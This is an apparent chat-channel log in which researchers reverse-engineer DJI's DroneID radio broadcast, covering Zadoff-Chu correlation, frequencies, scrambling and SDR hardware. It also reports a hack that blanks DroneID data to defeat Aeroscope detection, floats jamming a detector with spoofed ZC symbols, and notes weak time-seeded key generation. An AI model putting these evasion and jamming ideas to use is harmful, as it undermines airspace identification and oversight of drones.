[2022-04-08 18:10:38] hostile : maybe I should continue embracing my "Negrodamus" side !?

[2022-04-08 18:13:42] hostile :

[2022-04-08 18:14:32] hostile : maybe I should continue embracing my "Negrodamus" side !? ^

[2022-04-08 21:41:49] proto : What I meant by that statement was that I upsampled by 4 (61.44 MSPS giving an FFT size of 4096), and then ran an autocorrelator that looked for a window of 4096 samples where the first half matched the reverse of the second half. I was taking advantage of the fact that the Zadoff-Chu (ZC) sequence is symmetrical about the center. Since the ZC sequence is a CAZAC (Constant Amplitude, Zero Auto Correlation) it does a great job and not having an autocorrelation output that slowly ramps up (making it hard to tell what the true starting point was). Instead it gives a really nice peak. The reason for upsampling prior was to help get around the fact that I didn't have anything to equalize against to help deal with frequency drift. A sample offset in the time domain becomes an increasing frequency offset in the frequency domain. So by being as accurate as possible in the time domain starting sample, I can prevent most of the smearing that happens to the constellation in the frequency domain. Now, this method doesn't do anything about the fact that I have no idea what the phase offset is, and it also doesn't correct for the frequency offset. The phase offset might be fixable if there are points where the phase is known ahead of time (would need to figure out the ZC sequence root and offset), or maybe with the DC carrier which seems to have a constant phase offset (though it's low amplitude and I worry that in low SNR it's going to be useless). For the frequency offset the ZC sequence might be usable. Since it does repeat, and does so on average less than one OFDM symbol (I can explain further if you're curious), I *think* it can be used to determine the frequency offset. Though, I am also curious about the time domain view of the second ZC sequence. It sorta looks like it repeats itself regularly. If true then we might be able to use it like the preamble of an 802.11 frame. Hope that clears up my response to @hostile. Happy to answer any questions. Lord knows I've asked a lot so far :)

[2022-04-08 21:44:12] proto : oh, and I'm not a DSP expert. These are just tricks that I've picked up over the years to deal with demodulating signals. So if you see that I've said something stupid, please point it out! I don't want to give bad info

[2022-04-08 22:20:24] atlantic : The first ZC is not sensitive to carrier frequency offset due to its properties, visual in the waterfall as a chirp. It always gives a single peak even in the presence of cfo. There are only a few with that property, so therefore it is also used in the uplink, so I get false positives on the uplink packets when they hop around the same freq as the drone id. The second ZC has only a single peak if you corrected cfo, otherwise it gives 2 or 4 or more peaks.

[2022-04-08 22:21:08] proto : Are you talking about auto or cross correlation? I can't cross correlate as I don't know the ZC root/offset

[2022-04-08 22:21:37] proto : I would love to know the ZC params to do equalization :)

[2022-04-08 22:21:39] atlantic : oversampling makes it more cimputational complex and is not necessary.

[2022-04-08 22:22:40] proto : oversampling def makes it more complex for sure. Not stoked about having to do that atm. But I need to be bang on the starting sample offset without knowing the ZC params to cross correlate for it. I was finding in my experiments that I needed to oversample to get really close to the true starting sample

[2022-04-08 22:22:55] atlantic : you have to find out the ZC params. just brute force it to find out, there are only that many,

[2022-04-08 22:23:54] proto : so i started doing just that and wanted to eyeball the spectrograms

[2022-04-08 22:24:02] proto : ``` fft_size = 1024; seqs = zeros(fft_size, 601); valid_seqs = zeros(fft_size, 1); for i=1:fft_size try seqs(i,:) = fftshift(ifft(zadoffChuSeq(i, 601))); valid_seqs(i) = 1; catch continue end end rows = 5; cols = 5; per_grid = rows * cols; f = figure('Visible','off'); for offset=0:per_grid:(fft_size) for i=1:per_grid subplot(rows, cols, i); spectrogram(seqs(offset+i,:)); end saveas(f, [mat2str(offset), '.png']); end ```

[2022-04-08 22:24:14] proto : super rough code, but that was me messing around with it

[2022-04-08 22:25:11] proto : i have heard from a friend that it's not a straight forward "plug this value in and get cookie" situation though. he mentioned something about having to puncture the output and possibly having to apply a cyclic shift

[2022-04-08 22:25:14] atlantic : you need to have the known ZC, because you need to have it because you need to do channel estimation with, to get rid of your phase errors.

[2022-04-08 22:26:09] proto : so i can get rid of all but the absolute phase error by oversampling in the time domain to get the fractional time offset fixed. but the absolute phase offset is def a problem for me

[2022-04-08 22:26:36] proto : i don't have much in the way of drifting phase error atm

[2022-04-08 22:27:15] atlantic : oversampling not necessary.

[2022-04-08 22:27:28] proto : do you know if it really is just brute forcing roots from 1 to N and correlating to find the correct ZC?

[2022-04-08 22:27:46] atlantic : sure

[2022-04-08 22:28:07] atlantic : in time domain

[2022-04-08 22:28:09] proto : no crazy puncturing, rotate by 4, stand on one foot kina thing?

[2022-04-08 22:28:18] atlantic : hell no

[2022-04-08 22:28:31] proto : lol welp, time to turn my computer into a heater :D

[2022-04-08 22:28:58] proto : thanks for the info!

[2022-04-08 22:29:52] atlantic : enjoy your quest

[2022-04-08 22:34:45] proto : one thing i'm not clear on as far as dealing with phase offsets: generally you have pilots to help correct for the walking phase offset in the freq domain that's caused by not having the *perfect* starting sample in the time domain. i suppose the burst is short enough that the first zc can be used to figure out what the walking phase offset is, and extrapolate from there how far to move the phase of each other carrier in the previous and next ofdm symbols. is that common practice in lte? i've only had experience with WiFi at the physical layer and we have pilots to deal with the time offset issue. it just seems strange to have the samples you use for equalization happening *after* the burst has started. really, just curious about why it works this way

[2022-04-08 23:07:45] proto : why hello there zc sequences :D not 10000% sure these are right just yet, but promising

[2022-04-09 03:27:56] proto : thanks for the advice @atlantic!! i think that did it :D

[2022-04-09 03:28:37] proto : it's really interesting to me that the first zc can be used even if there is a *massive* frequency offset O.O

[2022-04-09 05:22:25] skyninja : ZC = a very big pilot

[2022-04-09 05:39:23] skyninja : ZC in the middle: suppose you have the first symbol ZC to do channel estimation etc. There will be a small error x. so the next symbol has error x, the 2nd next will have error 2x, the 6th symbol will have 6x. when you put the symbol in the middle, the 3rd symbol before will have error -3x and the 3rd symbol after will have 3x. And 3x in half of 6x.

[2022-04-09 07:17:15] tmbinc : BTW if someone needs my IQ recording of 1.3s at 200MS/s, I'm happy to share but it's 2GB. It contains uplink (with hopping), downlink, and droneid. I also started to look for the hopping algorithm in the S1 software. Big unknowns yet but I know roughly where the channel number is calculated, where the hopping is done and where the switch of the hopping sequence (subframe 330, every 640 subframes) is done. If someone is interested, I know how to enable logging on the S1 (it comes through a different USB pipe), but it doesn't have strings, only message IDs, for which I know a very small subset (by reversing LC1860 firmware, which still has strings, or P1 software, which still has some strings) but a lot is unknown especially for L1 (which is handled on the Cortex-M on S1, but on the DSP for LC1860 and P1)

[2022-04-09 07:20:36] tmbinc : I need to look into my RF chain again. I was not having a lot of luck with equalizing to ZC (as opposed to using it for frequency offset detection)

[2022-04-09 07:20:36] tmbinc : I need to look into my RF chain again. I was not having a lot of luck with equalizing to ZC (as opposed to using it for sample offset detection)

[2022-04-09 07:23:33] atlantic : just look at the excitement you get from discovering yourself (-:

[2022-04-09 07:26:14] atlantic : Now you are able to detect drone id packets even in the presense of CFO, you should now make a tool to cut out slices that only contain the packet and leave out the rest. Just take 3x the packet length, packet in the middle. You are never gonna find scrambling etc by looking at one packet. So you need to collect packet. Different drones, different drone types etc, so you can see structure. What changes, what stays the same etc. @tmbinc already offered one.

[2022-04-09 07:26:14] atlantic : Now you are able to detect drone id packets even in the presense of CFO, you should now make a tool to cut out slices that only contain the packet and cut out the rest. Just take 3x the packet length, packet in the middle. You are never gonna find scrambling etc by looking at one packet. So you need to collect packet. Different drones, different drone types etc, so you can see structure. What changes, what stays the same etc. @tmbinc already offered one.

[2022-04-09 07:26:14] atlantic : Now you are able to detect drone id packets even in the presense of CFO, you should now make a tool to cut out slices that only contain the packet and leave out the rest. Just take 3x the packet length, decimated to 15.36 MS/s, packet in the middle. You are never gonna find scrambling etc by looking at one packet. So you need to collect packet. Different drones, different drone types etc, so you can see structure. What changes, what stays the same etc. @tmbinc already offered one.

[2022-04-09 07:26:22] atlantic : Here is my donation of a sample:

[2022-04-09 07:26:36] atlantic : https://doi.org/10.5281/zenodo.4246392

[2022-04-09 07:28:04] tmbinc : Oh very nice!

[2022-04-09 07:30:03] atlantic : so make a drone id packet cut tool and that 2GB of @tmbinc will be two small files with a drone id. Easy to share and work on as a team.

[2022-04-09 07:32:15] atlantic : and of course decimate to 15.36 MS/s with the packet roughly in the center.

[2022-04-09 07:33:52] tmbinc : I thought we may want to go the next step and cover all 3 signals :)

[2022-04-09 07:34:56] atlantic : First you have to do the basic, then continue with the rest, Rome wasn't build in a day.

[2022-04-09 07:35:25] atlantic : But yes, I can do droneid but not downlink, so I am in (-:

[2022-04-09 13:02:42] bin4ry : I ran a test with an Aeroscope. If i am not mistaken the droneID broadcast is not disabled, but the information in it will be gone after applying the magic.

[2022-04-09 13:03:00] bin4ry :

[2022-04-09 13:03:37] bin4ry : CIAJeepDoors was the idea of @hostile,lol

[2022-04-09 13:03:37] bin4ry : The CIAJeepDoors name was the idea of @hostile,lol

[2022-04-09 13:04:53] bin4ry : i also did a video, but due to my skills the video is unbearable

[2022-04-09 13:07:29] bin4ry : this is a Mavic3 running the 01.00.0600 firmware

[2022-04-09 13:07:39] bin4ry : I also tested the Mini SE (Wifi)

[2022-04-09 13:08:07] bin4ry : Mini needs arming of motors to send the broadcast, the Mavic3 starts broadcasting as soon as powered on (which was already mentioned here)

[2022-04-09 13:08:59] atlantic : Is this permanent or something you have to apply each flight?

[2022-04-09 13:09:26] bin4ry : it sticks. i have tested it with the latest dji fly and an online phone

[2022-04-09 13:09:37] bin4ry : it starys there over several reboots and restarts of the app

[2022-04-09 13:10:04] bin4ry : i have tested another app version (sadly stupid me cannot emember which one it was) and it did reset the values on boot

[2022-04-09 13:10:21] bin4ry : but the current one doesn't reset the flags and the broadcast stays like this

[2022-04-09 13:10:43] skyninja : this is much better than spoofing

[2022-04-09 13:11:21] bin4ry : so dji is tricky here again, they claim the broadcast cannot be disabled, which is somewhat true ... but , you see yourself, the info is gone

[2022-04-09 13:11:21] bin4ry : so dji is tricky here again, they claim the broadcast cannot be disabled, which is somewhat true ... but , you see yourself

[2022-04-09 13:11:21] bin4ry : so dji is tricky here again, they claim the boarcast cannot be disabled, which is somewhat true ... but , you see yourself

[2022-04-09 13:12:40] bin4ry : and well, for security reasons i would suggest more testing with versions and phones and OSes, that the flags stay disabled

[2022-04-09 13:12:50] hostile : CIAJeepDoors is an anagram for DJIAeroscope. I lost my shit when the anagram solver spit it out, because of stuff like this. https://cj3b.info/History/Congo15.html

[2022-04-09 13:13:19] hostile : @bin4ry you rock mate. I just got up have to chill with the kids. Will check back later!

[2022-04-09 13:13:23] bin4ry : of course it is not a gurantee that there aren't other ways to locate, but atleast it would break the aeroscope detection in it's current form

[2022-04-09 13:14:38] konraditurbe : This one, right? https://www.apkmirror.com/apk/dji-technology-co-ltd/dji-fly/dji-fly-1-5-10-release/

[2022-04-09 13:16:02] konraditurbe : What does the Aeroscope show when the drone has the hack enabled? Does it just not show anything at all?

[2022-04-09 13:16:29] hostile : "fakefake" on the screen and 0,0 for GPS?

[2022-04-09 13:16:33] bin4ry : @konraditurbe images AS4-AS6 is AFTER the hack

[2022-04-09 13:16:52] bin4ry : AS,AS2 is prior the hack

[2022-04-09 13:17:44] konraditurbe : Meant on the map, if it places a marker anywhere at all.

[2022-04-09 13:18:24] bin4ry : The AS places the marker to NullIsland ;)

[2022-04-09 13:18:24] bin4ry : The AS places the marker to Null Island ;)

[2022-04-09 13:27:41] dkovar : 0,0 is a buoy in the Atlantic - https://en.wikipedia.org/wiki/Null_Island

[2022-04-09 13:28:07] bin4ry : will tweet this to annoy dji

[2022-04-09 13:28:22] bin4ry : but will edit out the DH.com background in the 3 image, lol

[2022-04-09 14:32:25] tmbinc : ok cool! BTW in S1 firmware there are multiple conditions which need to be true for droneid broadcasts to happen

[2022-04-09 14:32:47] tmbinc : so very likely we could also just disable the broadcast alltogether by sending something to the S1

[2022-04-09 15:20:04] cs2000 : fantastic proof of concept there @bin4ry love the anagram from Aeroscope @hostile , this group comes up with the best names !

[2022-04-09 15:25:39] atlantic : the frequencies for drone id are 2414.5, 2429.5, 2444.5 and 2459.5 Mhz. if you want to annoy DJI on Twitter, it helps if you tweet the right frequencies, other DJI are LOL ?

[2022-04-09 15:25:39] atlantic : the frequencies for drone id are 2414.5, 2429.5, 2444.5 and 2459.5 Mhz. i you want to annoy DJI on Twitter, it helps if you tweet the right frequencies, other DJI are LOL ?

[2022-04-09 15:25:39] atlantic : the frequencies for drone id are 2414.5, 2429.5, 2444.5 and 2459.5 Mhz. if you want to annoy DJI on Twitter, it helps if you tweet the right frequencies, otherwise DJI are LOL ?

[2022-04-09 15:27:25] atlantic : Does anyone knows the drone id freqs in 5725-5850 Mhz?

[2022-04-09 15:30:33] atlantic : How does uplink knows it can transmit? is that one cue of downlink, or does it have fixed time slots?

[2022-04-09 15:30:47] the_lord : what about the 5.8 Ghz droneID frequencies?

[2022-04-09 15:31:25] atlantic : yes that was my question as well.

[2022-04-09 15:31:51] the_lord : you mean the drone doesn't transmit droneID on 5.8Ghz?

[2022-04-09 15:32:15] atlantic : it does, i just do not know the freqs

[2022-04-09 15:34:15] atlantic : does an Aeroscope says what freqs he listens to?

[2022-04-09 15:35:40] the_lord : AS gives the RF type and RF index

[2022-04-09 15:36:23] the_lord : there are 8 modules for each protocol

[2022-04-09 15:41:21] the_lord : RF_Type[0] = LB RF_Type[1] = WiFI RF_Type[2] = SDR

[2022-04-09 15:41:59] the_lord : and the module index you can configure its frequency for each RF type

[2022-04-09 15:45:25] the_lord : the default frequency for each module is: RF_Index[0] = 2.4 RF_Index[1] = 2.4 RF_Index[2] = 5.8 RF_Index[3] = 5.8 RF_Index[4] = 2.4 RF_Index[5] = 2.4 RF_Index[6] = 5.8 RF_Index[7] = 5.8

[2022-04-09 15:45:25] the_lord : the default frequency for each module is: RF_Index[0] = 2.4 RF_Index[1] = 2.4 RF_Index[2] = 5.8 RF_Index[3] = 5.8 RF_Index[4] = 2.4

[2022-04-09 15:46:25] the_lord : so the answer is yes, you can tell on which frequency you detected the drone and on which protocol

[2022-04-09 15:48:46] the_lord : DJI's web app doesn't show these detection details

[2022-04-09 15:56:20] hostile : I wonder what detail the SDK gives

[2022-04-09 16:30:32] atlantic : ok, that proves it receives on 5.8 as well

[2022-04-09 16:35:00] proto : Thank you very much for the info!

[2022-04-09 16:37:27] proto : I was considering uploading individual bursts, but was concerned about the fact that my GPS location would be in the file :( Maybe firing up a GPS spoofer and then recording? Would either need a direct connection (wired) to the GPS input or an RF enclosure to prevent freaking out all the devices around me tho

[2022-04-09 17:09:20] hostile : just run down the road to a park

[2022-04-09 17:09:21] hostile : =]

[2022-04-09 17:21:34] jan2642 : GPS is below the noise floor. It doesn’t take much power to disrupt a whole region. You could do it indoors, just remember you can take off the blades ;-)

[2022-04-09 17:23:23] hostile : yeah I don't advise spoofing GPS generally speaking

[2022-04-09 17:26:38] the_lord : I remember how my wife used to freak-out whenever I spoof the GPS with old date/time :D all apps on her mobile stop working

[2022-04-09 19:08:08] konraditurbe : wrap the drone in tinfoil

[2022-04-09 19:11:24] tmbinc : I don't care that much about my GPS position tbh

[2022-04-09 19:11:32] tmbinc : it's relatively easy to look up my address

[2022-04-09 19:12:03] the_lord : I used to spoof GPS to test NFZ hacks back in 2017

[2022-04-09 19:25:56] jan2642 : If I would have to spoof GPS I don’t have anything left to record the transmission of the drone…

[2022-04-09 20:12:58] dragorn : has anyone got some pcaps they're willing to share w/ some of the legacy "definitely v1" (whatever you want to call it) droneid on wifi? I've integrated the new "v2" (for lack of a better term for it) which uses a longer 0x10 flight record message, but there's some debate if it's truly all v2; some devices in the pcap that we'd expect to be legacy are *definitely* sending the longer 0x10 message (the version long enough for a GPS time + app coord block) vs the original format, which had neither of those, and are versioning it as a 0x10 0x02 v2 message. I don't have my original pcaps from years ago of the v1 advertisements.

[2022-04-09 20:23:43] the_lord : AS tcp pcap ?

[2022-04-09 20:46:11] the_lord : P4A: 0x00 0x01 0x00 P3S: 0x01 0x10 0x01 In2: 0x00 0x01 0x00 P4: 0x01 0x10 0x02 P4A: 0x00 0x00 0x00 + 0x01 0x10 0x01 (broadcasting 2 different droneID) M300: 0x01 0x10 0x02 Mavic 3: 0x01 0x10 0x03

[2022-04-09 20:46:11] the_lord : P4A 0x00 0x01 0x00 P3S 0x01 0x10 0x01 In2 0x00 0x01 0x00 P4 0x01 0x10 0x02 P4A 0x00 0x00 0x00 + 0x01 0x10 0x01 (broadcasting 2 different droneID) M300 0x01 0x10 0x02 Mavic 3 0x01 0x10 0x03

[2022-04-09 21:02:21] dragorn : @the_lord a wifi pcap; they drop it in the IE 221 vendor tag of beacons when they're sending it

[2022-04-09 21:05:01] the_lord : sorry I don't have wifi pcap

[2022-04-09 21:05:25] dragorn : no worries, appreciated

[2022-04-09 21:05:44] the_lord : all drones I have at the moment are MP, mini2 and M3

[2022-04-09 21:16:52] mutantroar : I think the only drone generating a working v1 wifi drone id is the Spark. The Mavic Pro in Wifi mode will generate the packet in the vendor tag, but the data is all 00. The Air and Mini WiFi drones broadcast v2.

[2022-04-09 21:21:49] jan2642 : IIRC I captured some MP1 wifi years ago which had data in the IE tags. It’s in that D13 paper @hostile posted. I can make a new capture in a few days.

[2022-04-09 21:23:07] dragorn : @mutantroar I remember multiple devices being very wacky w/ the IE tag, yeah - I remember it being firmware rev based rather than hw based, but it's been years so...

[2022-04-09 21:23:20] hostile : I was going to buy a Mavic Air or Spark as I assumed it was something specific to them. We seem to have a v1, and v1.5 (somewhere in between), and a v2 packet.

[2022-04-09 21:23:33] dragorn : @jan2642 that'd be awesome when you get the time; ironically i helped write that paper & wrote the code behind it, I just don't have the pcaps anymore :)

[2022-04-09 21:23:37] hostile : so yeh @jan2642 if you have one you'll save me a few hundred bucks. =]

[2022-04-09 21:24:04] dragorn : but it sounds like the new stuff is all "v2" now anyhow even w/ old firmware, which kind of matches what I've seen in the newer pcaps

[2022-04-09 21:24:51] dragorn : https://github.com/kismetwireless/kismet/blob/master/dot11_parsers/dot11_ie_221_dji_droneid.cc#L45

[2022-04-09 21:29:47] jan2642 : I don’t have a Spark but I do have an MA. I can capture that tomorrow (we’re gone for a weekend and I brought the MA along)

[2022-04-09 21:58:29] hostile : btw... for anyone saying to themselves. "Surely no one would use a Mavic Air in a warzone..."

[2022-04-09 21:58:32] hostile :

[2022-04-09 21:58:37] hostile : https://t.me/grey_zone/13315

[2022-04-09 22:00:24] hostile :

[2022-04-09 22:01:03] the_lord : for whoever interested in ocusync droneID frequencies : I did test today and found the following frequencies from mini2 and Mavic 3: 2414.5, 2429.5, 2444.5, 2459.5, 2474.5, 5741.5, 5756.5, 5771.5, 5786.5, 5801.5, 5816.5, 5831.5

[2022-04-09 22:01:28] the_lord : I was scanning out of standard range and these were the only frequencies I found

[2022-04-09 22:01:53] the_lord : 2.3-2.5 / 5.6 - 5.9

[2022-04-09 22:02:56] the_lord : to speed up the finding I switched both drones on without RC to eliminate the uplink false detection

[2022-04-09 22:03:21] hostile : I'm still shocked they auto broadcast now even when props are not armed. very sketchy

[2022-04-09 22:03:56] the_lord : I discovered that even if you force the drone on 2.4 it broadcasts droneID on bot 2.4 and 5.8

[2022-04-09 22:03:56] the_lord : I discovered that even if you force the drone on 2.4 it broadcasts droneID on both 2.4 and 5.8

[2022-04-09 22:04:29] the_lord : and the droneID frequency keeps changing simi hopping

[2022-04-09 22:12:19] proto : i was wondering why i wasn't seeing droneid traffic in 2.4 for seconds at a time. thanks for the info!

[2022-04-09 22:12:31] proto : really wish i had an x300 these days :(

[2022-04-09 22:13:12] the_lord : i'm using cloned hackRF :D

[2022-04-09 22:14:16] proto : oof, hard mode lol

[2022-04-09 22:14:36] proto : at least you didn't have to shell out $990 O.o

[2022-04-09 22:14:36] proto : at least you didn't have to shell out $900 O.o

[2022-04-09 22:14:50] the_lord : I saw 2474.5 only 8 times during the 20 minutes test from 2 drones broadcasting at the same time

[2022-04-09 22:15:09] proto : yikes, well that's gonna be annoying for collecting lots of bursts

[2022-04-09 22:15:24] proto : may have to write some freq hopping nonsense :(

[2022-04-09 22:15:24] proto : may have to write some freq hopping nonsense "(

[2022-04-09 22:15:24] proto : may have to write some freq hopping nonsense :(

[2022-04-09 22:16:03] proto : there was a post here a day or two ago about the hopping sequence of droneid following a predictable path. do you know if that's actually the case?

[2022-04-09 22:16:18] proto : would be nice if so. could wait until no bursts, and move to the next freq

[2022-04-09 22:17:29] proto : i say that as though it's as easy as tapping a yagi on the cpu and out pops a script to handle that logic..

[2022-04-09 22:17:45] the_lord : I didn't finish testing yet, looking for frequency change sequence is in mind

[2022-04-09 22:18:53] the_lord : I was testing without antenna to minimize noise

[2022-04-09 22:22:52] proto : dunno about the hackrf, but the ettus radios like running with the rx gain maxed. lower noise figure :)

[2022-04-09 22:22:56] proto : https://kb.ettus.com/images/a/ae/B200mini_B205_RF_Performance_Data_20160119.pdf

[2022-04-09 22:24:47] the_lord : during this test I discovered I have a lot of noise in my place at 2444.5 and 5756.5

[2022-04-09 22:25:46] proto : what are the odds that a drone ID channel could be spammed with invalid data symbols, but valid ZC symbols? something like a DoS that keeps the receiver of the AS busy so it misses valid frames? i'm not sure about where in the receive state machine the AS will figure out that something goofy is happening and give up. if it happens later in the state machine, then maybe even a lower power burst will keep the AS' attention long enough to miss most of the frames from legit drones

[2022-04-09 22:26:17] proto : basically, modulate random BS in symbols 1, 2, 3, 5, 7, 8, and 9 but valid ZC in 4 and 6

[2022-04-09 22:26:49] proto : can the turbo decoder detect something's fucky before the end?

[2022-04-09 22:27:24] proto : i'm making an assumption that the only thing that could prevent turbo decoding is the ZC not being valid

[2022-04-09 22:28:09] the_lord : this question not for me, I capture the signal and eye ball it for droneID :sweat_smile: I don't know what's ZC and BS :D

[2022-04-09 22:40:55] proto : an open question to anyone that might know: is the first LFSR in the scrambler generation using the LTE standard default value? I'm in the process of writing a MATLAB/Octave script to pluck droneID frames out of a larger collect so I can compare multiple bursts, but I suspect I'm still going to have to brute force the LFSR initial value (unless it's dumb like all ones, zeros, reversals, etc) which is going to be a fair chunk of time considering there are 2.15 billion possibilities assuming that I only need to brute force one of the LFSR initial values O.O and i can only brute force if there are known values to validate that the scrambler removal was successful (dropping out to all zeros/ones as an example)

[2022-04-09 22:42:03] proto : i know there are techniques for discovering the taps and initial fills for direct scramblers (assuming just one LFSR is doing the scrambling). i do not know of anything that do that with two LFSRs XOR'd together

[2022-04-09 22:58:30] hostile : @j4ck and @tho maybe have some hints ^ ?

[2022-04-09 23:00:00] proto : i should have noted that i tried using 0x12345678 and reversals thereof, but didn't see anything heavily weighted to ones or zeros in the first 64 bits of the first symbol. but, could definitely be an issue on my side. i did find out that i was demodulating the data carriers as bpsks... so let's not rule out me being dumb...

[2022-04-09 23:00:57] proto : https://github.com/proto17/dji_droneid/blob/main/matlab/automatic_detector.m#L202 is what i was trying

[2022-04-09 23:18:16] hostile : That's the stupidest combination I've ever heard in my life! "1-2-3-4-5, that's amazing! I've got the same combination on my luggage!" https://www.youtube.com/watch?v=_JNGI1dI-e8

[2022-04-09 23:20:20] proto : man, really gaining an appreciation of matlab. soooo many `run function, get cookie` features compared to octave

[2022-04-10 07:16:13] atlantic : Did you watch The Karate Kit when you were young? Mr Miyagi says you must first learn the basics: wax on, wax off. You must first have your demodulation to bits right, before you go to the next phase of scrambling. you want too fast. wax on. wax off.

[2022-04-10 07:42:23] atlantic : About jamming: you probably already discovered that if your ZC peak is only one sample off, it ruins your entire constellation. I haven't tried, but I assume that inserting ZC at the "right" moment, even with low power, will get an receiver lost.

[2022-04-10 07:44:01] atlantic : or insert ZC continiously so the odds increase that you have the right moment.

[2022-04-10 10:54:18] atlantic : BS=bullshit ?

[2022-04-10 13:45:48] tho : I'll check with the students, unfortunately I do not know the details

[2022-04-10 14:17:30] hostile : lol Wax on, Wax off before Paint the Fence!

[2022-04-10 14:18:23] hostile : https://www.youtube.com/watch?v=R37pbIySnjg

[2022-04-10 14:18:56] hostile : @atlantic says its all in the wrist @proto :sweat_smile: :rolling_on_the_floor_laughing: :joy:

[2022-04-10 14:19:07] hostile : "don't forget to breathe"

[2022-04-10 14:40:08] proto : so i just realized that the bit to symbol mapping wasn't right for LTE according to https://github.com/ttsou/openphy/blob/master/src/lte/qam.c#L35 so i fixed that little bug. derp

[2022-04-10 16:52:28] atlantic : https://github.com/open-sdr/openwifi/issues/143

[2022-04-10 16:52:48] atlantic : this is a cool board.

[2022-04-10 16:54:39] atlantic : can somebody program that Zynq FPGA? if we can offload the ZC correlation to an FPGA, the rest of Ocusync drone id decoding can on the cpu.

[2022-04-10 18:47:28] tmbinc : Or ADALM-PLUTO but uh they got expensive

[2022-04-10 18:47:43] tmbinc : Also most WiFi chipsets support a raw RX/TX mode

[2022-04-10 18:48:30] hotelzululima : wouldn"t PLUTO need a GPSDO added?

[2022-04-10 18:48:41] tmbinc : not for receiving

[2022-04-10 18:48:53] hotelzululima : ah k

[2022-04-10 18:49:04] tmbinc : I mean also not for transmitting if you don't care about the exact frequency :)

[2022-04-10 18:49:22] tmbinc : And since this is all happening in 2.4G/5G bands, it should work fine(tm)

[2022-04-10 18:50:14] hotelzululima : sheesh.. should have bought a few more, PLUTO DID get expensive...

[2022-04-10 18:52:07] atlantic : i assumed the fpga on the pluto is very small and does not allow for adding much

[2022-04-10 18:55:59] tmbinc : Yeah it's a XC7Z010

[2022-04-10 18:56:11] tmbinc : (is that actually different silicon than the 020?)

[2022-04-10 18:56:42] hotelzululima : FPGA Logic Cells: 28k Block RAM: 2.1Mb DSP Slices 80

[2022-04-10 18:57:18] hotelzululima : https://wiki.analog.com/university/tools/pluto/devs/specs

[2022-04-10 19:01:20] atlantic : i have a pluto, but i cannot program vhdl etc and i also do not have the toolchain.

[2022-04-10 19:01:28] mutantroar : You'll miss the 5.8Ghz with the Pluto

[2022-04-10 19:01:47] atlantic : you can mod the pkuto to 6 ghz

[2022-04-10 19:01:59] atlantic : sw mod

[2022-04-10 19:09:00] mutantroar : did not know that..thnks

[2022-04-10 19:09:02] tmbinc : We'd need overlapping FFTs and then correlation right?

[2022-04-10 19:10:06] tmbinc : Or could we preselect by checking for CPs first?

[2022-04-10 19:20:19] hotelzululima : wasnt aware of pluto+ https://github.com/plutoplus/plutoplus

[2022-04-10 19:21:18] hotelzululima : btw https://www.rtl-sdr.com/techminds-performing-the-frequency-expansion-and-cpu-core-mod-on-the-plutosdr/

[2022-04-10 20:05:23] mutantroar : That makes the pluto a very inexpensive alternative to the BladeRF

[2022-04-10 20:10:00] hiddentty : hiddentty joined the channel.

[2022-04-10 20:18:41] atlantic : my (naieve) implementation is scipy.signal.correlate. a sample of 1 sec takes 4 sec to correlate. i also use cusignal that speeds up a lot, but you need an nvidia gpu for that.

[2022-04-10 20:20:12] atlantic : if there is a software trick or fpga that "preselects", that would help a lot.

[2022-04-10 20:21:10] hiddentty : Hi new here ! very interested by the subject

[2022-04-10 20:21:40] atlantic : In normal LTE N=62, that is zo much faster than N=601 or N=1201.

[2022-04-10 20:21:40] atlantic : In normal LTE N=62, that is so much faster than N=601 or N=1201.

[2022-04-10 20:22:07] hiddentty : i've done a thread on r/DJIUnlocker Reddit sub's about this subject the last week.

[2022-04-10 20:25:34] atlantic : Also an normal Pluto has USB 2.0 so it cannot sample so fast continiously, only bursts. So if a FPGA can preselect and only actual packets go over USB that will help a lot.

[2022-04-10 20:26:02] hiddentty : According to many sources Ocusync protocols include a layer of encryptions of the Tx .. At my known AES-256 has not been broken .. So if a device is able to get the flight data we have two possibilities, the first is a backdoor is laying somewhere. the second (and maybe both) the keys or the way of generate keys is known and used in thoses aeroscope.

[2022-04-10 20:26:09] hiddentty : I'm right ?!

[2022-04-10 20:30:09] jan2642 : Or third and even more likely: some data is considered 'broadcast' and not encrypted at all. With Wifi this is the case, video stream is encrypted but drone id is part of the 802.11 beacons and not encrypted.

[2022-04-10 20:30:14] atlantic : Aeroscope receives a separate unencrypted signal

[2022-04-10 20:30:48] atlantic : there are 3 signals: uplink, downlink, drone id

[2022-04-10 20:31:40] atlantic : see the very nice png from @tmbinc a couple of days ago.

[2022-04-10 20:33:37] hiddentty : Thank's guys for the clarifications, i've just began to read the previous messages, a massive amount of research has already been done !

[2022-04-10 20:36:25] atlantic : pluto has usb 2.0 limiting the sample rate.

[2022-04-10 20:41:08] jan2642 : A new LimeSDR Mini 2.0 (USB3) with a Lattice ECP5 is supposedly 'launching soon' on CrowdSupply: https://www.crowdsupply.com/lime-micro/limesdr-mini-2-0

[2022-04-10 20:42:39] jan2642 : Max 3.5 GHz though...

[2022-04-10 20:45:56] jan2642 : No idea what the price will be but the original LimeSDR Mini was $159.

[2022-04-10 21:17:53] blackie37 : blackie37 joined the channel.

[2022-04-10 22:17:12] b1tninja : I remember looking at the key derivation and it looked like they seeded random with the startup time or something stupid like that, so maybe only a few keys are really ever used anyway

[2022-04-10 22:17:12] b1tninja : I remember looking at the fw and it looked like they seeded random with the startup time or something stupid like that, so maybe only a few keys are really ever used anyway

[2022-04-10 23:27:35] hostile : @hiddentty the reddit thread seemed more hopeful, and inquisitive than anything. Seemed like random folks spitballing ideas. https://www.reddit.com/r/DJIUnlocked/comments/twbwi0/dji_aeroscope_how_to_avoid_aircraft_identification/

[2022-04-10 23:29:29] hostile : basically I think this comment "So for me, there is only one way to achieve that .. there is a backdoor somewhere or the encryption keys or gen scheme of the RC/Aircraft are known and used in the Aeroscope" seems to miss the fact that DroneID communications are out of band (OOB) from the standard C2 link.

[2022-04-11 01:25:55] dragorn : generic comment re: encryption - you don't have to break the algo to break a misuse of it or a known key, too :) Even RC4 in WEP wasn't as hilariously broken as it seems, they just did a *terrible* job using it *correctly*.

[2022-04-11 01:26:21] dragorn : but yeah the droneid stuff is meant for "public" (semi-public?) consumption

[2022-04-11 02:15:53] b1tninja :

[2022-04-11 02:16:19] b1tninja : ``` __seedval = time((time_t *)0x0); srand48(__seedval); iVar2 = 0; do { uVar3 = lrand48(); ```

[2022-04-11 06:16:54] qq2921635643 : qq2921635643 joined the channel.

